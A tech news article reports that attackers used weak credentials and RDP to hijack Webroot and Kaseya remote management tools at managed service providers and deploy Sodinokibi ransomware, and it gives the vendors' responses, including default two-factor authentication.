Hackers target MSPs to launch ‘supply chain’ ransomware attacks

Kaseya and Webroot blame customers’ poor cyber security hygiene for letting attackers into their systems

Cyber attack on company

Businesses are being infiltrated by cyber criminals who are actively exploiting weak account credentials to gain access to systems installed by managed service providers (MSPs) and launch ransomware attacks.

Hackers have targeted customers via the remote monitoring and management tools provided by at least two companies, Webroot and Kaseya, in order to deploy the Sodinokibi malware, according to reports via Reddit.

Further investigation by security company Huntress Labs uncovered that MSPs were being targeted with the ransomware by exploiting remote desktop protocol (RDP) for initial access.

In two incidents, after gaining admin privileges the attackers then uninstalled Webroot and ESET software, as well as endpoint-based backup Veeam.

Advertisement
Advertisement - Article continues below
Advertisement - Article continues below

In another report, the firm found that Webroot's management console was used to execute a PowerShell based payload to download additional malware. Kaseya's VSA was also used to deliver Sodinokibi in a separate incident.

The scale of the incident is not fully known, but Huntress Labs suggest it could affect thousands of clients. The affected MSP, which has not been named publicly, is being offered technical assistance from Huntress Lab's CEO.

UBX Cloud, the company which originally created a thread about these reports, described the situation as "insanity" and suggested several Kaseya customers were affected according to a conference call.

Both Webroot and Kaseya have confirmed a portion of their customers have been infiltrated by threat actors, and have pointed the finger at inconsistent and lax password management. The integrity of their own products has apparently not been affected.

"We all know that two-factor authentication (2FA) is a cyber hygiene best practice, and we've encouraged customers to use the Webroot Management Console's built-in 2FA for some time," Webroot's senior vice president of products Chad Bacher said on Reddit.

"Recently, Webroot's Advanced Malware Removal team discovered that a small number of customers were impacted by a threat actor exploiting a combination of customers' weak cyber hygiene practices around authentication and RDP."

Advertisement - Article continues below

The company has decided, as a result, to initiate a console logout for those using its tools and release a software update that enables 2FA by default across all clients.

"We are aware of limited instances where customers were targeted by threat actors who leveraged compromised credentials to gain unauthorized access to privileged resources," Kaseya CTO John Durant told Dark Reading.

"All available evidence at our disposal points to the use of compromised credentials."

The rise of such supply chain cyber attackers were previously flagged by a National Cyber Security Centre (NCSC) report released last year. A large number of MSPs were subject to attacks in 2017, with the report suggesting when done well, these compromises are extremely difficult and sometimes impossible to detect.

Featured Resources

Digitally perfecting the supply chain

How new technologies are being leveraged to transform the manufacturing supply chain

Download now

Three keys to maximise application migration and modernisation success

Harness the benefits that modernised applications can offer

Download now

Your enterprise cloud solutions guide

Infrastructure designed to meet your company's IT needs for next-generation cloud applications

Download now

The 3 approaches of Breach and Attack Simulation technologies

A guide to the nuances of BAS, helping you stay one step ahead of cyber criminals

Download now
Advertisement

Recommended

Visit/security/internet-security/354417/avast-and-avg-extensions-pulled-from-chrome
internet security

Avast and AVG extensions pulled from Chrome

19 Dec 2019
Visit/security/354156/google-confirms-android-cameras-can-be-hijacked-to-spy-on-you
Security

Google confirms Android cameras can be hijacked to spy on you

20 Nov 2019

Most Popular

Visit/operating-systems/25802/17-windows-10-problems-and-how-to-fix-them
operating systems

17 Windows 10 problems - and how to fix them

13 Jan 2020
Visit/microsoft-windows/32066/what-to-do-if-youre-still-running-windows-7
Microsoft Windows

What to do if you're still running Windows 7

14 Jan 2020
Visit/policy-legislation/general-data-protection-regulation-gdpr/354577/data-protection-fines-hit-ps100m
General Data Protection Regulation (GDPR)

Data protection fines hit £100m during first 18 months of GDPR

20 Jan 2020
Visit/web-browser/30394/what-is-http-error-503-and-how-do-you-fix-it
web browser

What is HTTP error 503 and how do you fix it?

7 Jan 2020